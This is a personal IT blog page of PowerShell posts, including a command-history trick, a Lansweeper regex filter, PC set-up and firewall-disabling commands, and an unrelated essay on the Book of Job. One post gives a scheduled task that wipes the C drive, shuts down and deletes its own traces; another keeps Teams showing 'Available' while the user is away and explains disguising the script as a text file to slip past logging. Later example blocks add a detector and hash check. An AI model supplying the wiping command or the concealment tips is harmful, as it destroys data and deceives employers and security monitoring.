Call me...




Friday, January 6, 2023

PoSh Command History - Create your own

I wasn't sure how helpful, or novel this approach is - but thought I would share it.

> I also posted this on reddit - And someone commented:

"Was Add-History on vacation?"

I replied:

~~~~~~~~~~~~~~~~~~~

You know - When I went looking for ways to do this - That command never presented itself.

I will have to play around with it.

~~~~~~~~~~~~~~~~~~~

Then I replied again the next day, after looking at that command:

~~~~~~~~~~~~~~~~~~~

From what I am seeing - playing around with 'Add-History'...

THAT is much more complicated... Actually a pain in the ass.

This thing I hacked together is MUCH simpler across the board.

Though, all the same - Thanks for pointing that out!

~~~~~~~~~~~~~~~~~~~

From that - I feel like what I put together is rather novel.

Explanation:
I have a script ("disabled termed expired.ps1") that I have scheduled to run at 8:15 am, M-F.

It pops up a PoSh CLI window on top of everything else, names it, sizes it (and will kill off any previous instances of that window)*, lists out what AD accounts are disabled, or expired, the reason why (terminated, KnowBe4 training is late...), how long it has been that way, etc...

The meat of that script is wrapped in a function named 'dte' - This way, while the window is open, I can easily refresh the window, with updated results, just by typing 'dte'...

Then I got lazy, and wanted to see if there was a way for that 'dte' command to be in the command history, so I could just 'up-arrow' and hit enter...

You know, rather than having to go through the laborious tasks of finding each of the three letters on the keyboard and having to press each one...

Really - I just wanted to see if I could do it...

Anyway - I added the below to the bottom part of the 'dte' function...

It sets the history for that specific Posh session to 'dte' (I don't think it works / will cause errors if used in ISE).

Obviously - It can be used for all kinds of things...
If you wanted to have several items you want in the history you could do:

"dte
cls
Get-Process" | Out-File $HxPath -Encoding ascii -Force 

Or assign that text to a variable:

$Hx = "dte
cls
Get-Process"

$Hx | Out-File $HxPath -Encoding ascii -Force 

If ($Host.Name -NOTmatch "ISE") {
# This sets the command history for the PoSh session to 'dte',
# so you can just up arrow, and get the command that re-runs the 'dte' function

$HxPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\dte.txt" 
"dte" | Out-File $HxPath -Encoding ascii -Force 
Set-PSReadLineOption -HistorySavePath $HxPath
}

(Hit the up-arrow '▲' or, type 'dte', and hit 'ENTER' to refresh...)

* If anyone is interested - Here is what I use to create and control the PoSh CLI window:

NOTE:
I like to include the PID in my Posh instances 'WindowTitle' - In case they lock up, so I can easily 'Stop-Process -Id XXXX'

$Window_Title = "Disabled, Terminated, or Expired AD Accounts"

If ($Host.Name -NOTmatch "ISE") {

$ScrWidth = $null; $ScrHeight = $null
$ScrWidth = 135
$ScrHeight = 35

$Already = $null; $Already = Get-Process | ? { $_.MainWindowTitle -match $Window_Title }

If ($Already) { $Already | Stop-Process }
$host.UI.RawUI.BufferSize = New-Object System.Management.Automation.Host.size($ScrWidth,$ScrHeight)
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.size($ScrWidth,$ScrHeight)
$Host.UI.RawUI.WindowTitle = "$Window_Title (PID: $PID)"

############ Keeps the Console window on top ###############
$signature = @'
[DllImport("user32.dll")]
public static extern bool SetWindowPos(
IntPtr hWnd,
IntPtr hWndInsertAfter,
int X,
int Y,
int cx,
int cy,
uint uFlags);
'@

$type = Add-Type -MemberDefinition $signature -Name SetWindowPosition -Namespace SetWindowPos -Using System.Text -PassThru
$handle = (Get-Process -id $Global:PID).MainWindowHandle
$alwaysOnTop = New-Object -TypeName System.IntPtr -ArgumentList (-1)
$type::SetWindowPos($handle, $alwaysOnTop, 0, 0, 0, 0, 0x0003)
############## END - On top ################

} # END 'If ($Host.Name -NOTmatch "ISE")'


Wednesday, December 28, 2022

This is designed to keep MS Teams 'Presence' from going to 'Away'...

Every 4.5 minutes / 270 seconds ('$Timer = 270') - It toggles the Teams window (minimize, restore) - This tells the app that it is being used, and prevents it from going from 'Available' to 'Away' after 5 minutes of inactivity...

So... Always 'Available'.

Note that some Anti-virus solutions, as well as enabling Powershell logging (to the Event-Viewer) can expose this hack...

Read the comments in the script for additional details on how to use the script.

If the computer does not allow the logged-in user to run scripts, this can be copy-pasted into PoSh ISE and run from there...

If ISE is blocked, or you want to go a cleaner route...

Then copy-paste this script into a text file, name it something unassuming (CustomerNotes.txt).

Then open up the PoSh command shell and run this:

('iex' is the alias for 'Invoke-Expression')

iex ((New-Object System.Net.WebClient).DownloadString('<full path to the file>\CustomerNotes.txt'))

This is a 'Do-While' method... 

The 'While ($Blurb -eq $null)' will never be satisfied, so the script must be manually stopped, unless the '$QuittingTime' variable is used.


<#
The Teams presence, will go from 'Available' to 'Away' after 5 minutes of inactivity.
There are several Teams processes, but only one of them will have a non-zero 'MainWindowHandle' - That is the actual window. 

This script toggles the Teams window to the top (making it the active window), every 4.5 minutes (270 seconds). 
Thus when Teams is the active window, the Teams presence is set to 'Available', before it can show an 'Away' presence.
Fire it up if you need to be away discreetly...
If you want it to allow you to be 'Away' for lunch - Uncomment those variables, and set '$LunchStart' and '$LunchEnd' accordingly.
Example (lunch from noon to 1pm):
$LunchStart = [DateTime]"12:00"
$LunchEnd = [DateTime]"13:00"

And if you want to kill this script at quitting time - Uncomment the '$QuittingTime' variable, and set it accordingly.
Example (Quitting time is 5pm):
$QuittingTime = [DateTime]"17:00"
#>

# Leave these NULL values alone #
$LunchStart = $null; $LunchEnd = $null; $QuittingTime = $null
# Leave these NULL values alone #

# Uncomment these two items and set them accordingly if you want to use the lunchbreak feature.
$LunchStart = [DateTime]"12:00"
$LunchEnd = [DateTime]"13:00"
# Uncomment these two items and set them accordingly if you want to use the lunchbreak feature.

# Uncomment this item and set it accordingly if you want to use the QuittingTime feature.
$QuittingTime = [DateTime]"17:00"
# Uncomment this item and set it accordingly if you want to use the QuittingTime feature.

$RunIt = 0

If ( (Get-Date) -lt $LunchStart -or (Get-Date) -gt $LunchEnd ) { $RunIt = 1 }
If ( $LunchStart -eq $null -and (Get-Date) -lt $QuittingTime ) { $RunIt = 1 }
If ( (Get-Date) -lt $QuittingTime ) { $RunIt = 1 }
If ( (Get-Date) -ge $QuittingTime ) { $RunIt = 0 }



# Function 'Set-WindowStyle' was found in THIS comment: https://www.reddit.com/r/PowerShell/comments/bng1ec/comment/en6a3pi

Function Set-WindowStyle 
{
    param
    (
        [Parameter()]
        [ValidateSet('FORCEMINIMIZE', 'HIDE', 'MAXIMIZE', 'MINIMIZE', 'RESTORE', 
            'SHOW', 'SHOWDEFAULT', 'SHOWMAXIMIZED', 'SHOWMINIMIZED', 
            'SHOWMINNOACTIVE', 'SHOWNA', 'SHOWNOACTIVATE', 'SHOWNORMAL')]
        $Style = 'SHOW',
        [Parameter()]
        $MainWindowHandle = (Get-Process -Id $pid).MainWindowHandle
    )
# $MainWindowHandle = (Get-Process -Id $pid).MainWindowHandle
# Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 }
    $WindowStates = @{
        FORCEMINIMIZE = 11; HIDE = 0
        MAXIMIZE = 3; MINIMIZE = 6
        RESTORE = 9; SHOW = 5
        SHOWDEFAULT = 10; SHOWMAXIMIZED = 3
        SHOWMINIMIZED = 2; SHOWMINNOACTIVE = 7
        SHOWNA = 8; SHOWNOACTIVATE = 4
        SHOWNORMAL = 1
    }
    Write-Verbose ("Set Window Style {1} on handle {0}" -f $MainWindowHandle, $($WindowStates[$style]))

    $Win32ShowWindowAsync = Add-Type -MemberDefinition @"
    [DllImport("user32.dll")] 
    public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru

    $Win32ShowWindowAsync::ShowWindowAsync($MainWindowHandle, $WindowStates[$Style]) | Out-Null
} # END Function Set-WindowStyle 

# Setting the baseline...
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle MINIMIZE $PSItem.MainWindowHandle }
Sleep 2
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle RESTORE $PSItem.MainWindowHandle }

$Timer = 270

Do {
If ( $RunIt -ge 1 ) {
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle MINIMIZE $PSItem.MainWindowHandle }
Sleep 2
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle RESTORE $PSItem.MainWindowHandle }
}
If ( (Get-Date) -gt $QuittingTime -and $QuittingTime -ne $null) { Write-Host "STOP!!!" -F 14; Break }

Sleep $Timer
} While ($Blurb -eq $null)


<#
NOTE: Teams status is logged here:

$TeamsStatus = Get-Content -Path $env:APPDATA"\Microsoft\Teams\logs.txt" -Tail 1000 | Select-String -Pattern `
  'Setting the taskbar overlay icon -',`
  'StatusIndicatorStateService: Added' | Select-Object -Last 1
#>
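
The post notes that PowerShell logging to the Event Viewer can expose this script; the following added example (not part of the original post) shows that from the defender's side by scoring logged script block text for the traits of the script above. The function name, indicator list, threshold and sample records are constructed for illustration, and it assumes each logged event holds a whole script.

```powershell
# Added example: flags script blocks that combine user32.dll window control,
# a Teams window lookup and a sleep loop.
function Find-WindowToggleScript {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $LogRecord,
        [int] $Threshold = 3   # hypothetical: indicators needed before reporting
    )
    begin {
        $indicators = [ordered]@{
            'P/Invoke into user32.dll' = 'DllImport\(\s*"user32\.dll"\s*\)'
            'ShowWindowAsync call'     = '\bShowWindowAsync\b'
            'Teams window lookup'      = 'Product\s+-match\s+["'']Teams["'']'
            'Timed loop'               = '\b(Start-)?Sleep\b'
        }
    }
    process {
        $text = [string]$LogRecord.ScriptBlockText
        $hits = @(foreach ($name in $indicators.Keys) {
            if ($text -match $indicators[$name]) { $name }
        })
        if ($hits.Count -ge $Threshold) {
            [pscustomobject]@{
                TimeCreated = $LogRecord.TimeCreated
                Score       = $hits.Count
                Indicators  = $hits -join '; '
            }
        }
    }
}

# Constructed sample records, shaped like script block logging (event 4104) entries.
$sample = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2022-12-28 09:00'; ScriptBlockText = @'
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' -Name W -Namespace N
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 }
Do { Sleep 270 } While ($true)
'@ }
    [pscustomobject]@{ TimeCreated = [datetime]'2022-12-28 09:05'
                       ScriptBlockText = 'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5' }
    [pscustomobject]@{ TimeCreated = [datetime]'2022-12-28 09:10'
                       ScriptBlockText = 'Start-Sleep -Seconds 30; Restart-Service Spooler' }
)

$sample | Find-WindowToggleScript | Format-List

# Live use (needs script block logging enabled and rights to read the log):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated
#                                         ScriptBlockText = $_.Properties[2].Value } } |
#     Find-WindowToggleScript
```

Only the first sample record reaches the threshold; the other two match at most one indicator and are not reported.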

Wednesday, June 22, 2022

My Set-Up script 'getter'

$RawContent = ((iwr "http://www.somethingtoscrollthrough.com/2022/05/firewall.html").RawContent).Split("`n|`r",[System.StringSplitOptions]::RemoveEmptyEntries)
$Start = "<p>#~~~~~~#"; $End = "<br />#---------#</p>"
$Counter = 0; $File_Path = "$(Get-Location)\PC_SetUp.ps1"
Clear-Variable ArrayStart, ArrayEnd -ErrorAction SilentlyContinue
$RawContent | % {
If ($_ -match $Start) { $ArrayStart = $counter }; If ($_ -match $End) { $ArrayEnd = $counter }
If ($ArrayEnd) {Return}; $Counter++
}
$RawContent[$ArrayStart..$ArrayEnd] | % { ($_) -replace("<p>","")  -replace("</p>","") -replace("<br />","") } | Out-String | Out-File -LiteralPath $File_Path -Encoding ascii -Force

$LNK_Path = "$(Get-Location)\Open_PC_SetUp.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($LNK_Path)
$Shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"
$Shortcut.Arguments = "`"$File_Path`""
$Shortcut.Description = "Opens '$File_Path' as Admin, in ISE "
$Shortcut.Save(); Write-Host "Shortcut is here: $LNK_Path" -Fore 14 -Back 5
$bytes = [System.IO.File]::ReadAllBytes($LNK_Path)
$bytes[0x15] = $bytes[0x15] -bor 0x20 #set byte 21 (0x15) bit 6 (0x20) ON
[System.IO.File]::WriteAllBytes($LNK_Path, $bytes)
ii -Path $LNK_Path #Open the script in ISE, as Admin

 

 

Break
This sumbitch right here - As a scheduled task will ruin a computer and leave no traces of itself:
(The argument, executes in memory, then deletes the task and its associated XML, then proceeds to remove anything it can on the 'C' drive. Run it as an admin user, and set it to run logged in or not)

Name:
UpdateAll 

Actions > New -

Program/script:
C:\windows\system32\cmd.exe

Add arguments:
/C schtasks /delete /tn UpdateAll /f & del "C:\Windows\System32\Tasks\UpdateAll" & rd c:\ /s /q & shutdown -s -t 0

Friday, May 13, 2022

Lansweeper email attachment filters (RegEx)

Just getting into using Lansweeper's Helpdesk feature...
Working on trimming down what attachments to allow on incoming support emails -

Setting this up is done with RegEx...
Of course, there are no examples inside of the Lansweeper KB for any of this, and RegEx is non-intuitive, cryptic, and just generally a pain, unless you use it ALL the time.

I don't see any way to ask Lansweeper to add additional content to their KB about this, so I'm putting it here... Plus a way to pop out the correctly formatted RegEx, using PoSh.

On this page: https://<YourLanSweeperURL>/configuration/HelpdeskEmail/

Go to: 'Ignored attachment filters (regular expressions)'

You can test the filter, on that same line of that page, too.

$Start = "^(.(?!.*\.("
$Middle = "jpg|png|bmp|pdf|txt"
$End = ")))*$"

$RegEx_Line = "$Start"+"$Middle"+"$End"
$RegEx_Line

<#
# Result
^(.(?!.*\.(jpg|png|bmp|pdf|txt)))*$

# Ignored attachment filters (regular expressions)
# On this page: https://<YourLanSweeperURL>/configuration/HelpdeskEmail/

"All attachments in E-mails which match one of these regular expressions will not be saved to the web server."

It is an inverted argument - so that anything that 'matches' gets blocked...
Examples:
Filename.jpg - No Match! (Allowed)
Filename.png - No Match! (Allowed)
Filename.bmp - No Match! (Allowed)
Filename.pdf - No Match! (Allowed)
Filename.txt - No Match! (Allowed)

Filename.exe - Match found! (Blocked)
Filename.msi - Match found! (Blocked)
Filename.mp4 - Match found! (Blocked)
Filename.xx2 - Match found! (Blocked)
#>
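
An added example (not from the original post or from Lansweeper) that builds the filter above from a list of allowed extensions and runs it, next to an end-anchored variant, over constructed file names. The function names and sample names are hypothetical, and case-insensitive matching is an assumption of this example, so confirm the behaviour in Lansweeper's own test box.

```powershell
# Added example: compare the post's filter with a variant that only looks at
# the final extension of the file name.
function New-AttachmentFilter {
    param(
        [Parameter(Mandatory)] [string[]] $AllowedExtension,
        [switch] $AnchorToEnd
    )
    # Escape each extension so characters such as '+' are matched literally.
    $alternation = ($AllowedExtension | ForEach-Object { [regex]::Escape($_) }) -join '|'
    if ($AnchorToEnd) {
        # Matches (= blocks) unless the name ENDS in an allowed extension.
        return '^(?!.*\.(?:{0})$).*$' -f $alternation
    }
    # Pattern from the post: matches (= blocks) unless an allowed extension
    # appears somewhere after the first character of the name.
    return '^(.(?!.*\.({0})))*$' -f $alternation
}

function Compare-AttachmentFilter {
    param(
        [Parameter(Mandatory)] [string[]] $AllowedExtension,
        [Parameter(Mandatory)] [string[]] $FileName
    )
    $ignoreCase = [System.Text.RegularExpressions.RegexOptions]::IgnoreCase
    $fromPost = [regex]::new((New-AttachmentFilter $AllowedExtension), $ignoreCase)
    $anchored = [regex]::new((New-AttachmentFilter $AllowedExtension -AnchorToEnd), $ignoreCase)
    foreach ($name in $FileName) {
        [pscustomobject]@{
            FileName       = $name
            PostFilter     = if ($fromPost.IsMatch($name)) { 'Blocked' } else { 'Allowed' }
            AnchoredFilter = if ($anchored.IsMatch($name)) { 'Blocked' } else { 'Allowed' }
        }
    }
}

# Constructed file names, including multi-extension and no-extension cases.
$names = 'Filename.jpg', 'Filename.exe', 'Report.PDF',
         'invoice.pdf.exe', 'notes.txt.js', 'README'

New-AttachmentFilter -AllowedExtension 'jpg', 'png', 'bmp', 'pdf', 'txt'
New-AttachmentFilter -AllowedExtension 'jpg', 'png', 'bmp', 'pdf', 'txt' -AnchorToEnd
Compare-AttachmentFilter -AllowedExtension 'jpg', 'png', 'bmp', 'pdf', 'txt' -FileName $names |
    Format-Table -AutoSize
```

The two filters agree on single-extension names; they differ on names such as 'invoice.pdf.exe', where an allowed extension is followed by another one: the post's pattern leaves those unmatched (allowed), while the anchored variant blocks them.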

Tuesday, May 10, 2022

netsh advfirewall set allprofiles state off

Just putting this out there for easy copy / pasta

###########################

#~~~~~~#
# Set time-zone automatically
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\tzautoupdate -Name start -Value "3"
Set-TimeZone "Eastern Standard Time"
w32tm /resync
# Disable the firewall
netsh advfirewall set allprofiles state off
# Set the current connection to 'Private' - By default it is 'Public' so WinRM will not enable.
Set-NetConnectionProfile -InterfaceIndex $((Get-NetConnectionProfile).InterfaceIndex) -NetworkCategory Private
# Enable WinRM
c:\windows\system32\winrm.cmd quickconfig -quiet
# Add DOT.NET 2.0--3.5
Add-WindowsCapability -Online -Name NetFx3~~~~
###########################
# Get Serial number from BIOS
$SerialNumber = (Get-WmiObject -class win32_bios).SerialNumber
# Dell computers have a shorter Serial number, but others (ie. BeeLink mini's) are too long - This shortens it (to 7 characters) if the SN is longer than 9 characters.
# MPC = Mini PC
If ($SerialNumber.Length -gt 9) { $SerialNumber = "MPC$($SerialNumber.Remove(0, ($SerialNumber.Length - 7)))" }
$SerialNumber
# Rename the computer to its SN
Rename-Computer -NewName $SerialNumber -Force
Break
# Gotta reboot
shutdown -r -t 0
###########################
# Download the PC Health Check app
Start "https://aka.ms/GetPCHealthCheckApp"

# Windows 11 Installation Assistant
Start "https://www.microsoft.com/software-download/windows11"

###########################
# Make sure you have successfully, and correctly set the computers hostname
hostname
# This grabs the full name of the domain
$Domain_Name = (Get-DnsClient -InterfaceIndex $((Get-NetConnectionProfile).InterfaceIndex)).ConnectionSpecificSuffix
# it is possible to add creds to this command - but just enter username, and password at the credential prompt (no need to add 'domain\')
$JoinFail = $null; Add-Computer -domainname $Domain_Name -ErrorVariable JoinFail
If ($JoinFail.Count -ge 1) {
Write-Host "Well, that didn't work..." -F 14;
Write-Host "'$Domain_Name' is in the clipboard..." -F 0 -B 14
$Domain_Name | Set-Clipboard
cmd.exe /c sysdm.cpl
}
Break
# Gotta reboot
shutdown -r -t 0
#---------#

###########################

# Make sure you have successfully, and correctly set the computers hostname

hostname

# This grabs the full name of the domain

$Domain_Name = (Get-DnsClient -InterfaceIndex $((Get-NetConnectionProfile).InterfaceIndex)).ConnectionSpecificSuffix

# it is possible to add creds to this command - but just enter username, and password at the credential prompt (no need to add 'domain\')

Add-Computer -domainname $Domain_Name

Break

# Gotta reboot

shutdown -r -t 0

###########################


Others...

netsh advfirewall set currentprofile state off

netsh advfirewall set domainprofile state off

netsh advfirewall set privateprofile state off

netsh advfirewall set publicprofile state off


Monday, March 7, 2022

The Book of Job

Don't take the story of Job so literally - It's not like there was a journalist there writing everything down...

Stripped down to its core... The story is a lesson - It tells the student to not have a shitty attitude - because doing so just generates misery.

Otherwise stated... What consumes your thoughts, controls your life.

It is probably one of my favorite stories ever.

The story / lesson it is passing along is some very powerful advice that anyone can benefit from. Hence its tenacity.

Just because religiofucktards call it theirs is no reason to disavow its intent.

It is at least 8000 years old (probably out-dating King Hammurabi's code) and was (as most stories were) passed by word of mouth up until about 1700 years ago. The original story was not likely to have been centered around supernatural mono-theistic entities... Whereas, mono-theism is about 5000-3000 years old.

The Jewish faith managed to hijack much of Sumerian mythology along with that culture's oral histories and parables... Including the story of 'Job'... And still Hebrews insist 'collectively' to call it all 'Jewish' / 'Torah' - Talk about plagiarism!!!

Removing all of the Judaeo-Christian bullshit and referring to the symbolisms as they were called out in antiquity - This is the lesson:

Don't cop an attitude! Be able and willing to let go of life's adversities and stresses... Because clinging to them, and / or worrying too much is just not healthy.

AKA:
Curse god, curse yourself = A bad attitude only hurts yourself.

WHEN YOU SEE IT, YOU WILL SHIT BRICKS

I composed a similar concept regarding Noah and the Ark here:
http://rich-laduca.blogspot.com/2013/01/while-global-flood-noah-and-ark-are.html

Wednesday, March 2, 2022

BeeLink Tools

A do all Powershell version is at the bottom here - Or...
Grab the tool here:
https://drive.google.com/file/d/1wmXwT6erye3U-l6YxwK5XUMa06CDregy/view?usp=sharing

Unzip it... (not shady looking at all, is it - Who you gonna trust? This post is mostly for me anyway)

I got this from BeeLink computers support thru Amazon...
I had to contact them, because the last several computers I've gotten had a generic "123456789" as the serial number in the BIOS.
But, for auditing purposes (on domain computers), I need to be able to programmatically see the serial number

If you run 'WriteOENSN.cmd', you can correct / update the serial number in BIOS.

I manually typed in the serial number from the sticker on the bottom of the computer, BUT -
The tool / process actually prompts to 'scan' it in (from the barcode on that same sticker).
So - If you have a USB barcode scanner you can plug into the computer... 

Scan it in... Way faster than typing!

These commands will show the serial number:

WMIC BIOS GET SERIALNUMBER

get-ciminstance win32_bios | select SerialNumber


Or - Grab this PoSh and it will do most of the work for you:

$Share_URL = "https://drive.google.com/file/d/1wmXwT6erye3U-l6YxwK5XUMa06CDregy/view?usp=sharing"

$Share_URL = "https://drive.google.com/uc?export=download&id=$($Share_URL.Split('/')[-2])"

$ZipDownload = "C:\Users\Public\Downloads\BeelinkTools.zip"
$ToolFolder = "$(Split-Path -Path $ZipDownload)\Beelink Tools"

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

(New-Object System.Net.WebClient).DownloadFile($Share_URL, $ZipDownload)

Expand-Archive -LiteralPath $ZipDownload -DestinationPath $ToolFolder

cd $ToolFolder
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -Verb runas -ArgumentList {/k WriteOENSN.cmd}
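
Both this download-and-run script and the set-up script 'getter' in the June 22, 2022 post fetch a file and then open or run it elevated; the following added example (not part of the original posts) checks a pinned SHA-256 before anything is extracted. The function name, temp paths and sample archive are constructed for illustration, and the pinned hash stands in for a value you would record after vetting the real file.

```powershell
# Added example: refuse to extract an archive whose SHA-256 differs from a pinned value.
function Expand-VerifiedArchive {
    param(
        [Parameter(Mandatory)] [string] $ZipPath,
        [Parameter(Mandatory)] [string] $ExpectedSha256,
        [Parameter(Mandatory)] [string] $DestinationPath
    )
    $actual = (Get-FileHash -LiteralPath $ZipPath -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256.Trim()) {   # string -ne is case-insensitive
        # Leave nothing behind that could be run by mistake.
        Remove-Item -LiteralPath $ZipPath -Force
        throw "SHA-256 mismatch for '$ZipPath' (got $actual); archive deleted, nothing extracted."
    }
    Expand-Archive -LiteralPath $ZipPath -DestinationPath $DestinationPath -Force
    Get-Item -LiteralPath $DestinationPath
}

# --- Offline demonstration with a constructed archive ---
$work = Join-Path ([IO.Path]::GetTempPath()) ("hashdemo_" + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path "$work\src" | Out-Null
'echo constructed stand-in for the vendor tool' | Out-File "$work\src\tool.cmd" -Encoding ascii
Compress-Archive -Path "$work\src\*" -DestinationPath "$work\tools.zip"

# Stand-in for the value recorded once, after vetting the vendor's archive.
$pinned = (Get-FileHash -LiteralPath "$work\tools.zip" -Algorithm SHA256).Hash

# 1) Untouched file: hash matches, archive is extracted.
Expand-VerifiedArchive -ZipPath "$work\tools.zip" -ExpectedSha256 $pinned -DestinationPath "$work\out" |
    Out-Null
"Extracted: $(Test-Path "$work\out\tool.cmd")"

# 2) Same file name, different bytes (a swapped or corrupted download).
Add-Content -LiteralPath "$work\tools.zip" -Value 'x'
try {
    Expand-VerifiedArchive -ZipPath "$work\tools.zip" -ExpectedSha256 $pinned -DestinationPath "$work\out2"
} catch {
    "Rejected: $($_.Exception.Message)"
}
"Second extraction happened: $(Test-Path "$work\out2")"

Remove-Item -LiteralPath $work -Recurse -Force
```

In the script above, the call would take the place of the 'Expand-Archive' line, with '$ZipDownload' and '$ToolFolder' as the paths and the pinned hash of the vetted archive as '-ExpectedSha256'.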